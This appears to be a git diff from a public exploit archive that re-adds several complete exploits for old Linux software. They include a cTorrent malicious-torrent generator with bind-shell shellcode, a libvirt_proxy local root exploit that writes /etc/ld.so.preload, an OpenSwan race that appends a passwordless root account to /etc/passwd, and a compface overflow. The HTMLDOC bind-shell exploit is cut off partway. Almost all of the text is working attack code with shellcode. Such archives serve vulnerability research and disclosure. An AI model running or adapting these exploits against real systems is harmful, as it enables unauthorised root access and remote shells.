"\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d" - shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad" - shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17" - shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26" - shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce" - - #The exact address of our buffer is 0xbffffccc, which ebx tells us - #however memeory changes before we control the eip, - #so we change the addr to hit the NOP sled - eip="\x11\xf1\xff\xbf" - #eip="\xcc\xfc\xff\xbf"#the add ebx is holding - - #this is a dummy address to satisfy other pointer before we return - #this cannot be the EIP becuase this location is written to! - dumb_addr="\xcc\xfc\xff\xbf" - - #nop sled - long_str="\x90"*(4028-len(shellcode)) - #memory around the shellcode is written to, but this is a safe place - long_str+=shellcode - #this 100byte buffer is written to before we control the eip - long_str+="\x90"*100 - long_str+=eip#4128 bytes is the EIP! - - #This pointer must be real becuase it is written to in btFiles::BuildFromMI - long_str+=dumb_addr#"this" - #We can control these addresses but we don't need them - #long_str+=dumb_addr#"metabuf" - #long_str+=dumb_addr#"saveas" - return long_str - -#Start of functions for bencoding: -def BTFailure(msg): - pass - -def decode_int(x, f): - f += 1 - newf = x.index('e', f) - n = int(x[f:newf]) - if x[f] == '-': - if x[f + 1] == '0': - raise ValueError - elif x[f] == '0' and newf != f+1: - raise ValueError - return (n, newf+1) - -def decode_string(x, f): - colon = x.index(':', f) - n = int(x[f:colon]) - if x[f] == '0' and colon != f+1: - raise ValueError - colon += 1 - return (x[colon:colon+n], colon+n) - -def decode_list(x, f): - r, f = [], f+1 - while x[f] != 'e': - v, f = decode_func[x[f]](x, f) - r.append(v) - return (r, f + 1) - -def decode_dict(x, f): - r, f = {}, f+1 - while x[f] != 'e': - k, f = decode_string(x, f) - r[k], f = decode_func[x[f]](x, f) - return (r, f + 1) - -decode_func = {} -decode_func['l'] = decode_list -decode_func['d'] = decode_dict -decode_func['i'] = decode_int -decode_func['0'] = decode_string -decode_func['1'] = decode_string -decode_func['2'] = decode_string -decode_func['3'] = decode_string -decode_func['4'] = decode_string -decode_func['5'] = decode_string -decode_func['6'] = decode_string -decode_func['7'] = decode_string -decode_func['8'] = decode_string -decode_func['9'] = decode_string - -def bdecode(x): - try: - r, l = decode_func[x[0]](x, 0) - except (IndexError, KeyError, ValueError): - raise BTFailure("not a valid bencoded string") - if l != len(x): - raise BTFailure("invalid bencoded value (data after valid prefix)") - return r - -from types import StringType, IntType, LongType, DictType, ListType, TupleType - - -class Bencached(object): - - __slots__ = ['bencoded'] - - def __init__(self, s): - self.bencoded = s - -def encode_bencached(x,r): - r.append(x.bencoded) - -def encode_int(x, r): - r.extend(('i', str(x), 'e')) - -def encode_bool(x, r): - if x: - encode_int(1, r) - else: - encode_int(0, r) - -def encode_string(x, r): - r.extend((str(len(x)), ':', x)) - -def encode_list(x, r): - r.append('l') - for i in x: - encode_func[type(i)](i, r) - r.append('e') - -def encode_dict(x,r): - r.append('d') - ilist = x.items() - ilist.sort() - for k, v in ilist: - r.extend((str(len(k)), ':', k)) - encode_func[type(v)](v, r) - r.append('e') - -encode_func = {} -encode_func[Bencached] = encode_bencached -encode_func[IntType] = encode_int -encode_func[LongType] = encode_int -encode_func[StringType] = encode_string -encode_func[ListType] = encode_list -encode_func[TupleType] = encode_list -encode_func[DictType] = encode_dict - -try: - from types import BooleanType - encode_func[BooleanType] = encode_bool -except ImportError: - pass - -def bencode(x): - r = [] - encode_func[type(x)](x, r) - return ''.join(r) - -class fileio: - def read_bencode(self,file): - infile = open(file,"r") - file=infile.read() - infile.close - return bdecode(file) - - #writes a dictionary to a bencoded file - def write_bencode(self,file,dict): - outfile = open(file, 'wb') - outfile.write(bencode(dict)) - outfile.close() - -#execute main -main() - -# milw0rm.com [2009-04-17] +#!/usr/bin/python + +#Written By Michael Brooks +#04/17/2009 + +#Stack Based Buffer Overflow +#The vulnerability is in the btFiles::BuildFromMI function +#inside the btfiles.cpp file + +#Exploit tested on cTorrent 1.3.4 using Debian Sarge using Linux kernel 2.4.27-3-386 +#Can't get the exploit working on a modern linux kernel because of ASLR + +#code is using python 2.5 + +#Home page for cTorrent 1.3.4: +#http://sourceforge.net/projects/ctorrent/ 161,000+ Downloads +#dTorrent 3.3.2 is also vulnerable: +#http://sourceforge.net/projects/dtorrent/ 18,000+ downloads + +import sys +import os +#This code will take any torrent file and turn it into an exploit. +USAGE="python exploit.py in_file.torrent out_file.torrent" + +def main(): + #Start of the program + bfile=fileio() + try: + bad_torrent=bfile.read_bencode(sys.argv[1]) + except: + print USAGE + sys.exit() + + exploit_str=create_exploit() + print("Writing Bytes:"+str(len(exploit_str))) + bad_torrent["info"]["files"][0]["path"][0]=exploit_str + try: + bfile.write_bencode(sys.argv[2], bad_torrent) + except: + print USAGE + sys.exit() + +def create_exploit(): + # linux_ia32_bind - LPORT=4444 Size=108 Encoder=PexFnstenvSub http://metasploit.com + shellcode = "\x2b\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x27" + shellcode += "\x1a\xbe\x4e\x83\xeb\xfc\xe2\xf4\x16\xc1\xed\x0d\x74\x70\xbc\x24" + shellcode += "\x41\x42\x27\xc7\xc6\xd7\x3e\xd8\x64\x48\xd8\x26\x36\x46\xd8\x1d" + shellcode += "\xae\xfb\xd4\x28\x7f\x4a\xef\x18\xae\xfb\x73\xce\x97\x7c\x6f\xad" + shellcode += "\xea\x9a\xec\x1c\x71\x59\x37\xaf\x97\x7c\x73\xce\xb4\x70\xbc\x17" + shellcode += "\x97\x25\x73\xce\x6e\x63\x47\xfe\x2c\x48\xd6\x61\x08\x69\xd6\x26" + shellcode += "\x08\x78\xd7\x20\xae\xf9\xec\x1d\xae\xfb\x73\xce" + + #The exact address of our buffer is 0xbffffccc, which ebx tells us + #however memeory changes before we control the eip, + #so we change the addr to hit the NOP sled + eip="\x11\xf1\xff\xbf" + #eip="\xcc\xfc\xff\xbf"#the add ebx is holding + + #this is a dummy address to satisfy other pointer before we return + #this cannot be the EIP becuase this location is written to! + dumb_addr="\xcc\xfc\xff\xbf" + + #nop sled + long_str="\x90"*(4028-len(shellcode)) + #memory around the shellcode is written to, but this is a safe place + long_str+=shellcode + #this 100byte buffer is written to before we control the eip + long_str+="\x90"*100 + long_str+=eip#4128 bytes is the EIP! + + #This pointer must be real becuase it is written to in btFiles::BuildFromMI + long_str+=dumb_addr#"this" + #We can control these addresses but we don't need them + #long_str+=dumb_addr#"metabuf" + #long_str+=dumb_addr#"saveas" + return long_str + +#Start of functions for bencoding: +def BTFailure(msg): + pass + +def decode_int(x, f): + f += 1 + newf = x.index('e', f) + n = int(x[f:newf]) + if x[f] == '-': + if x[f + 1] == '0': + raise ValueError + elif x[f] == '0' and newf != f+1: + raise ValueError + return (n, newf+1) + +def decode_string(x, f): + colon = x.index(':', f) + n = int(x[f:colon]) + if x[f] == '0' and colon != f+1: + raise ValueError + colon += 1 + return (x[colon:colon+n], colon+n) + +def decode_list(x, f): + r, f = [], f+1 + while x[f] != 'e': + v, f = decode_func[x[f]](x, f) + r.append(v) + return (r, f + 1) + +def decode_dict(x, f): + r, f = {}, f+1 + while x[f] != 'e': + k, f = decode_string(x, f) + r[k], f = decode_func[x[f]](x, f) + return (r, f + 1) + +decode_func = {} +decode_func['l'] = decode_list +decode_func['d'] = decode_dict +decode_func['i'] = decode_int +decode_func['0'] = decode_string +decode_func['1'] = decode_string +decode_func['2'] = decode_string +decode_func['3'] = decode_string +decode_func['4'] = decode_string +decode_func['5'] = decode_string +decode_func['6'] = decode_string +decode_func['7'] = decode_string +decode_func['8'] = decode_string +decode_func['9'] = decode_string + +def bdecode(x): + try: + r, l = decode_func[x[0]](x, 0) + except (IndexError, KeyError, ValueError): + raise BTFailure("not a valid bencoded string") + if l != len(x): + raise BTFailure("invalid bencoded value (data after valid prefix)") + return r + +from types import StringType, IntType, LongType, DictType, ListType, TupleType + + +class Bencached(object): + + __slots__ = ['bencoded'] + + def __init__(self, s): + self.bencoded = s + +def encode_bencached(x,r): + r.append(x.bencoded) + +def encode_int(x, r): + r.extend(('i', str(x), 'e')) + +def encode_bool(x, r): + if x: + encode_int(1, r) + else: + encode_int(0, r) + +def encode_string(x, r): + r.extend((str(len(x)), ':', x)) + +def encode_list(x, r): + r.append('l') + for i in x: + encode_func[type(i)](i, r) + r.append('e') + +def encode_dict(x,r): + r.append('d') + ilist = x.items() + ilist.sort() + for k, v in ilist: + r.extend((str(len(k)), ':', k)) + encode_func[type(v)](v, r) + r.append('e') + +encode_func = {} +encode_func[Bencached] = encode_bencached +encode_func[IntType] = encode_int +encode_func[LongType] = encode_int +encode_func[StringType] = encode_string +encode_func[ListType] = encode_list +encode_func[TupleType] = encode_list +encode_func[DictType] = encode_dict + +try: + from types import BooleanType + encode_func[BooleanType] = encode_bool +except ImportError: + pass + +def bencode(x): + r = [] + encode_func[type(x)](x, r) + return ''.join(r) + +class fileio: + def read_bencode(self,file): + infile = open(file,"r") + file=infile.read() + infile.close + return bdecode(file) + + #writes a dictionary to a bencoded file + def write_bencode(self,file,dict): + outfile = open(file, 'wb') + outfile.write(bencode(dict)) + outfile.close() + +#execute main +main() + +# milw0rm.com [2009-04-17] diff --git a/platforms/linux/local/8534.c b/platforms/linux/local/8534.c index 0b45b304e..8028c3fc3 100755 --- a/platforms/linux/local/8534.c +++ b/platforms/linux/local/8534.c @@ -1,187 +1,187 @@ -/* - * cve-2009-0036.c - * - * libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036 - * - * Buffer overflow in the proxyReadClientSocket function in - * proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to - * gain privileges by sending a portion of the header of a virProxyPacket - * packet, and then sending the remainder of the packet with crafted values - * in the header, related to use of uninitialized memory in a validation - * check. - * - * Usage: - * - * We're guessing to hit our NOP sled, so this program should be run in a - * harness. Since the shellcode will execute /tmp/run as root, the following - * harness will insert a malicious getuid.so payload in /etc/ld.so.preload. - * - * #!/bin/sh - * - * echo "[+] compiling the exploit" - * gcc cve-2009-0036.c -o cve-2009-0036 - * - * echo "[+] creating /tmp/getuid.so" - * echo "int getuid(){return 0;}" > /tmp/getuid.c - * gcc -shared /tmp/getuid.c -o /tmp/getuid.so - * - * echo "[+] setting up /tmp/run" - * echo -e "#!/bin/sh" > /tmp/run - * echo -e "touch /tmp/success" >> /tmp/run - * echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run - * chmod +x /tmp/run - * - * echo "[+] starting exploit loop" - * i=0 - * rm -f /tmp/success - * while [ ! -e "/tmp/success" ] - * do - * i=$(($i+1)) - * echo "RUN NUMBER $i" - * ./cve-2009-0036 - * done - * - * echo "[+] our getuid.so is now in ld.so.preload" - * echo "[+] running su to obtain root shell" - * su - * - * Notes: - * - * Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1. - * We have a 4096 byte NOP sled before shellcode and EIP followed by 1000 - * NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's - * read(2). Our total sled is usually around 5k-10k NOPs so it'll take - * ~800-1600 tries on average to hit it and execute our shellcode. Each run - * takes ~1 second, so exploitation will probably take 10-20 minutes on - * average. - */ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -#define PROXY_PATH "/usr/libexec/libvirt_proxy" -#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn" -#define PROXY_PROTO_VERSION 1 -#define PROXY_PACKET_LENGTH 0xffff - -/* simple shellcode to execute /tmp/run */ -const char shellcode[]= - "\x31\xdb" - "\x8d\x43\x17" - "\x99" - "\xcd\x80" - "\x31\xc9" - "\x51" - "\x68\x2f\x72\x75\x6e" - "\x68\x2f\x74\x6d\x70" - "\x8d\x41\x0b" - "\x89\xe3" - "\xcd\x80"; - -struct proxy_packet { - uint16_t version; - uint16_t command; - uint16_t serial; - uint16_t len; -}; - -int -main(int argc, char **argv) -{ - FILE *fp; - long ptr; - int i, fd, pid, ret; - char *pkt, nop[65536]; - struct sockaddr_un addr; - struct proxy_packet req; - struct timeval tv; - - signal(SIGPIPE, SIG_IGN); - - /* guess a random offset to jmp to */ - gettimeofday(&tv, NULL); - srand((tv.tv_sec ^ tv.tv_usec) ^ getpid()); - ptr = 0xbf000000 + (rand() & 0x00ffffff); - - /* fire up the setuid libvirt_proxy */ - pid = fork(); - if (pid == 0) { - execl(PROXY_PATH, "libvirt_proxy", NULL); - } - - memset(nop, '\x90', sizeof(nop)); - - /* connect to libvirt_proxy's AF_UNIX socket */ - fd = socket(PF_UNIX, SOCK_STREAM, 0); - if (fd < 0) { - printf("[-] failed to create unix socket\n"); - return 1; - } - - memset(&addr, 0, sizeof(addr)); - addr.sun_family = AF_UNIX; - addr.sun_path[0] = '\0'; - strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH)); - - printf("[+] connecting to libvirt_proxy\n"); - - if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) { - printf("[-] cant connect to libvirt_proxy socket\n"); - return 1; - } - - /* transmit malicious payload to libvirt_proxy */ - pkt = (char *) &req; - memset(&req, 0, sizeof(req)); - req.version = PROXY_PROTO_VERSION; - req.len = PROXY_PACKET_LENGTH; - - printf("[+] sending initial packet header\n"); - send(fd, pkt, 7, 0); - - usleep(100000); - - printf("[+] sending corrupted length value\n"); - send(fd, pkt + 7, 1, 0); - - printf("[+] sending primary NOP sled\n"); - send(fd, nop, 4096, 0); - - printf("[+] sending primary shellcode\n"); - send(fd, shellcode, 28, 0); - - printf("[+] sending EIP overwrite (0x%lx)\n", ptr); - send(fd, &ptr, 4, 0); - - usleep(100000); - - printf("[+] sending secondary NOP/shellcode bundles\n"); - for (i = 0; i < 100; ++i) { - send(fd, nop, 1000, 0); - send(fd, shellcode, 28, 0); - } - close(fd); - - usleep(800000); - - /* clean slate if our guessed addr failed */ - kill(pid, SIGKILL); - - return 0; -} - -// milw0rm.com [2009-04-27] +/* + * cve-2009-0036.c + * + * libvirt_proxy <= 0.5.1 Local Privilege Escalation Exploit + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0036 + * + * Buffer overflow in the proxyReadClientSocket function in + * proxy/libvirt_proxy.c in libvirt_proxy 0.5.1 might allow local users to + * gain privileges by sending a portion of the header of a virProxyPacket + * packet, and then sending the remainder of the packet with crafted values + * in the header, related to use of uninitialized memory in a validation + * check. + * + * Usage: + * + * We're guessing to hit our NOP sled, so this program should be run in a + * harness. Since the shellcode will execute /tmp/run as root, the following + * harness will insert a malicious getuid.so payload in /etc/ld.so.preload. + * + * #!/bin/sh + * + * echo "[+] compiling the exploit" + * gcc cve-2009-0036.c -o cve-2009-0036 + * + * echo "[+] creating /tmp/getuid.so" + * echo "int getuid(){return 0;}" > /tmp/getuid.c + * gcc -shared /tmp/getuid.c -o /tmp/getuid.so + * + * echo "[+] setting up /tmp/run" + * echo -e "#!/bin/sh" > /tmp/run + * echo -e "touch /tmp/success" >> /tmp/run + * echo -e "echo \"/tmp/getuid.so\" > /etc/ld.so.preload" >> /tmp/run + * chmod +x /tmp/run + * + * echo "[+] starting exploit loop" + * i=0 + * rm -f /tmp/success + * while [ ! -e "/tmp/success" ] + * do + * i=$(($i+1)) + * echo "RUN NUMBER $i" + * ./cve-2009-0036 + * done + * + * echo "[+] our getuid.so is now in ld.so.preload" + * echo "[+] running su to obtain root shell" + * su + * + * Notes: + * + * Tested on Gentoo Linux 32-bit with GCC 4.3.3-r2 and randomize_va_space=1. + * We have a 4096 byte NOP sled before shellcode and EIP followed by 1000 + * NOP/30 byte shellcode bundles until we cause a EFAULT in libvirt_proxy's + * read(2). Our total sled is usually around 5k-10k NOPs so it'll take + * ~800-1600 tries on average to hit it and execute our shellcode. Each run + * takes ~1 second, so exploitation will probably take 10-20 minutes on + * average. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define PROXY_PATH "/usr/libexec/libvirt_proxy" +#define PROXY_SOCKET_PATH "/tmp/livirt_proxy_conn" +#define PROXY_PROTO_VERSION 1 +#define PROXY_PACKET_LENGTH 0xffff + +/* simple shellcode to execute /tmp/run */ +const char shellcode[]= + "\x31\xdb" + "\x8d\x43\x17" + "\x99" + "\xcd\x80" + "\x31\xc9" + "\x51" + "\x68\x2f\x72\x75\x6e" + "\x68\x2f\x74\x6d\x70" + "\x8d\x41\x0b" + "\x89\xe3" + "\xcd\x80"; + +struct proxy_packet { + uint16_t version; + uint16_t command; + uint16_t serial; + uint16_t len; +}; + +int +main(int argc, char **argv) +{ + FILE *fp; + long ptr; + int i, fd, pid, ret; + char *pkt, nop[65536]; + struct sockaddr_un addr; + struct proxy_packet req; + struct timeval tv; + + signal(SIGPIPE, SIG_IGN); + + /* guess a random offset to jmp to */ + gettimeofday(&tv, NULL); + srand((tv.tv_sec ^ tv.tv_usec) ^ getpid()); + ptr = 0xbf000000 + (rand() & 0x00ffffff); + + /* fire up the setuid libvirt_proxy */ + pid = fork(); + if (pid == 0) { + execl(PROXY_PATH, "libvirt_proxy", NULL); + } + + memset(nop, '\x90', sizeof(nop)); + + /* connect to libvirt_proxy's AF_UNIX socket */ + fd = socket(PF_UNIX, SOCK_STREAM, 0); + if (fd < 0) { + printf("[-] failed to create unix socket\n"); + return 1; + } + + memset(&addr, 0, sizeof(addr)); + addr.sun_family = AF_UNIX; + addr.sun_path[0] = '\0'; + strncpy(&addr.sun_path[1], PROXY_SOCKET_PATH, strlen(PROXY_SOCKET_PATH)); + + printf("[+] connecting to libvirt_proxy\n"); + + if (connect(fd, (struct sockaddr *) &addr, sizeof(addr)) < 0) { + printf("[-] cant connect to libvirt_proxy socket\n"); + return 1; + } + + /* transmit malicious payload to libvirt_proxy */ + pkt = (char *) &req; + memset(&req, 0, sizeof(req)); + req.version = PROXY_PROTO_VERSION; + req.len = PROXY_PACKET_LENGTH; + + printf("[+] sending initial packet header\n"); + send(fd, pkt, 7, 0); + + usleep(100000); + + printf("[+] sending corrupted length value\n"); + send(fd, pkt + 7, 1, 0); + + printf("[+] sending primary NOP sled\n"); + send(fd, nop, 4096, 0); + + printf("[+] sending primary shellcode\n"); + send(fd, shellcode, 28, 0); + + printf("[+] sending EIP overwrite (0x%lx)\n", ptr); + send(fd, &ptr, 4, 0); + + usleep(100000); + + printf("[+] sending secondary NOP/shellcode bundles\n"); + for (i = 0; i < 100; ++i) { + send(fd, nop, 1000, 0); + send(fd, shellcode, 28, 0); + } + close(fd); + + usleep(800000); + + /* clean slate if our guessed addr failed */ + kill(pid, SIGKILL); + + return 0; +} + +// milw0rm.com [2009-04-27] diff --git a/platforms/linux/local/876.c b/platforms/linux/local/876.c index cdc1c519b..d3115e590 100755 --- a/platforms/linux/local/876.c +++ b/platforms/linux/local/876.c @@ -153,6 +153,6 @@ int main( void ) printf( "shit happens\n" ); return( 1 ); -} - -// milw0rm.com [2005-03-14] +} + +// milw0rm.com [2005-03-14] diff --git a/platforms/linux/local/877.pl b/platforms/linux/local/877.pl index 5200f6883..3378c1e17 100755 --- a/platforms/linux/local/877.pl +++ b/platforms/linux/local/877.pl @@ -44,6 +44,6 @@ $buf = "A" x 8732; $buf .= (pack("l",(0xbfffffff-512+$offset)) x2); #exec("strace -u kfinisterre /usr/games/luxman -r 1 -f $buf"); -exec("/usr/games/luxman -r 1 -f $buf"); - -# milw0rm.com [2005-03-14] +exec("/usr/games/luxman -r 1 -f $buf"); + +# milw0rm.com [2005-03-14] diff --git a/platforms/linux/local/890.pl b/platforms/linux/local/890.pl index dc44c6d25..8afe33f1b 100755 --- a/platforms/linux/local/890.pl +++ b/platforms/linux/local/890.pl @@ -47,6 +47,6 @@ until(length($buffer)==$len) { $buffer.=$new_ret; } -exec("$oops -8 $buffer"); - -# milw0rm.com [2005-03-21] +exec("$oops -8 $buffer"); + +# milw0rm.com [2005-03-21] diff --git a/platforms/linux/local/895.c b/platforms/linux/local/895.c index 9c10d1bba..193a60cba 100755 --- a/platforms/linux/local/895.c +++ b/platforms/linux/local/895.c @@ -561,6 +561,6 @@ n = waitpid(t2, NULL, __WCLONE); printf("waitpid got %d/%d\n", n, errno); // killall(); cleanup(); -} - -// milw0rm.com [2005-03-22] +} + +// milw0rm.com [2005-03-22] diff --git a/platforms/linux/local/913.pl b/platforms/linux/local/913.pl index 6a87504c0..a1a7f5fbf 100755 --- a/platforms/linux/local/913.pl +++ b/platforms/linux/local/913.pl @@ -43,6 +43,6 @@ until (length($buffer) == $buf) { $buffer .= $new_ret; } -local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i"); - -# milw0rm.com [2005-04-05] +local($ENV{'HOME'}) = $buffer; exec("/home/lammat/aeon-0.2a/aeon $i"); + +# milw0rm.com [2005-04-05] diff --git a/platforms/linux/local/9135.sh b/platforms/linux/local/9135.sh index dc5297628..6ce1bc893 100755 --- a/platforms/linux/local/9135.sh +++ b/platforms/linux/local/9135.sh @@ -1,32 +1,32 @@ -#!/bin/bash -# uglyswan - OpenSwan local root exploit (CVE-2008-4190) -# -# description: -# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16, -# allows local users to overwrite arbitrary files and execute arbitrary code via a -# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files. -# NOTE: in many distributions and the upstream version, this tool has been disabled. -# -# vulnerable code: -# wget -o /dev/null -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version" -# sh < /tmp/ipseclive.conn -# -# the exploit: -# cat waits for the input from wget to the fifo and after it received it, you -# immediately echo your command into the fifo which was empty again and viola, it -# gets executed, because the sh binary needs a few milliseconds to get loaded, -# it's a typical race condition. -# -# problem: -# you need to trick root to execute "ipsec livetest", and this script needs to run in background... -# -# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks -# - -mkfifo /tmp/ipseclive.conn -cat /tmp/ipseclive.conn -echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn -rm /tmp/ipseclive.conn -su -l t00r - -# milw0rm.com [2009-07-13] +#!/bin/bash +# uglyswan - OpenSwan local root exploit (CVE-2008-4190) +# +# description: +# The IPSEC livetest tool in Openswan 2.4.12 and earlier, and 2.6.x through 2.6.16, +# allows local users to overwrite arbitrary files and execute arbitrary code via a +# symlink attack on the (1) ipseclive.conn and (2) ipsec.olts.remote.log temporary files. +# NOTE: in many distributions and the upstream version, this tool has been disabled. +# +# vulnerable code: +# wget -o /dev/null -O /tmp/ipseclive.conn "http://192.168.0.1/olts/?leftid=$leftid&$leftrsasigkey&version=$version" +# sh < /tmp/ipseclive.conn +# +# the exploit: +# cat waits for the input from wget to the fifo and after it received it, you +# immediately echo your command into the fifo which was empty again and viola, it +# gets executed, because the sh binary needs a few milliseconds to get loaded, +# it's a typical race condition. +# +# problem: +# you need to trick root to execute "ipsec livetest", and this script needs to run in background... +# +# I don't want no fame for this as it is ripped from Gentoo bug 238574, thanks +# + +mkfifo /tmp/ipseclive.conn +cat /tmp/ipseclive.conn +echo 'echo t00r::0:0::/tmp:/bin/sh>>/etc/passwd' > /tmp/ipseclive.conn +rm /tmp/ipseclive.conn +su -l t00r + +# milw0rm.com [2009-07-13] diff --git a/platforms/linux/local/914.c b/platforms/linux/local/914.c index 141ded52c..78a49a840 100755 --- a/platforms/linux/local/914.c +++ b/platforms/linux/local/914.c @@ -46,6 +46,6 @@ int main(int argc, char *argv[]) { return 0; -} - -// milw0rm.com [2005-04-05] +} + +// milw0rm.com [2005-04-05] diff --git a/platforms/linux/local/924.c b/platforms/linux/local/924.c index 644c8d592..7cc5d501d 100755 --- a/platforms/linux/local/924.c +++ b/platforms/linux/local/924.c @@ -48,6 +48,6 @@ memcpy(buffer+i,shellcode,strlen(shellcode)); execlp("/sbin/sash","sash","-c",buffer); return 0; -} - -// milw0rm.com [2005-04-08] +} + +// milw0rm.com [2005-04-08] diff --git a/platforms/linux/local/9302.py b/platforms/linux/local/9302.py index eba67feb7..f636fdc46 100755 --- a/platforms/linux/local/9302.py +++ b/platforms/linux/local/9302.py @@ -1,41 +1,41 @@ -#!/usr/bin/python -#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit -#[*] Affected : compface 1.1.5 -#[*] Tested on : Ubuntu 9.04 (without stack randomization) -#[*] Refer : bid/35863 -#[*] Exploit : His0k4 - -#[*] Use : $compface exploit.xbm out - -#setuid/execve shellcode for Linux/x86 by Marco Ivaldi -#[*] x86/alpha_mixed succeeded with size 124 (iteration=1) -shellcode=( -"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" -"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" -"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" -"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" -"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42" -"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f" -"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b" -"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50" -"\x45\x5a\x41\x41") - -payload = "#define noname_width 48\r\n" -payload += "#define noname_height 48\r\n" -payload += "static\r\n" -payload += "\x90"*180 -payload += "\x80\xf4\xff\xbf" #$esp+10h -payload += "\x90"*16 -payload += shellcode -payload += "\r\n" -payload += "char = {\r\n" - -try: - out_file = open("exploit.xbm","w") - out_file.write(payload) - out_file.close() - print("\nExploit file created!\n") -except: - print "Error" - -# milw0rm.com [2009-07-30] +#!/usr/bin/python +#[*] Exploit : Compface '.xbm' Local Buffer Overflow Exploit +#[*] Affected : compface 1.1.5 +#[*] Tested on : Ubuntu 9.04 (without stack randomization) +#[*] Refer : bid/35863 +#[*] Exploit : His0k4 + +#[*] Use : $compface exploit.xbm out + +#setuid/execve shellcode for Linux/x86 by Marco Ivaldi +#[*] x86/alpha_mixed succeeded with size 124 (iteration=1) +shellcode=( +"\x89\xe1\xdb\xd1\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49\x49\x49" +"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a" +"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32" +"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +"\x42\x4a\x42\x37\x50\x58\x50\x31\x49\x4b\x48\x4d\x4d\x50\x42" +"\x4a\x44\x4b\x50\x58\x4d\x49\x51\x42\x42\x48\x46\x4f\x46\x4f" +"\x44\x33\x45\x38\x42\x48\x46\x4f\x42\x42\x42\x49\x42\x4e\x4b" +"\x39\x4d\x33\x51\x42\x50\x53\x4c\x49\x4b\x51\x48\x4d\x4d\x50" +"\x45\x5a\x41\x41") + +payload = "#define noname_width 48\r\n" +payload += "#define noname_height 48\r\n" +payload += "static\r\n" +payload += "\x90"*180 +payload += "\x80\xf4\xff\xbf" #$esp+10h +payload += "\x90"*16 +payload += shellcode +payload += "\r\n" +payload += "char = {\r\n" + +try: + out_file = open("exploit.xbm","w") + out_file.write(payload) + out_file.close() + print("\nExploit file created!\n") +except: + print "Error" + +# milw0rm.com [2009-07-30] diff --git a/platforms/linux/local/950.c b/platforms/linux/local/950.c index ab80c087c..1b1c376db 100755 --- a/platforms/linux/local/950.c +++ b/platforms/linux/local/950.c @@ -97,6 +97,6 @@ int main(int argc, char *argv[]) } exit (0); -} - -// milw0rm.com [2005-04-21] +} + +// milw0rm.com [2005-04-21] diff --git a/platforms/linux/local/9595.c b/platforms/linux/local/9595.c index e8a360c52..886ecf4e1 100755 --- a/platforms/linux/local/9595.c +++ b/platforms/linux/local/9595.c @@ -1,81 +1,81 @@ -/* - -HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) -Reference: http://www.securityfocus.com/bid/35727 - -Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) -Credit: ANTHRAX666 for finding the vulnerability - -Coded by Pankaj Kohli -http://www.pank4j.com - -pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space -2 -pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f -pankaj@zion:~/test/htmldoc$ ./htmldocb0f - -[*] Creating buffer -[*] Exploit file written to sploit.html -Run as: htmldoc -f somefile.pdf sploit.html - -pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 -pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html & -[1] 3287 -pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 -tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN - -*/ - -#include -#include - - -/* Port binding (xor encoded) shellcode (port 4444) */ -char code[] = -"\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" 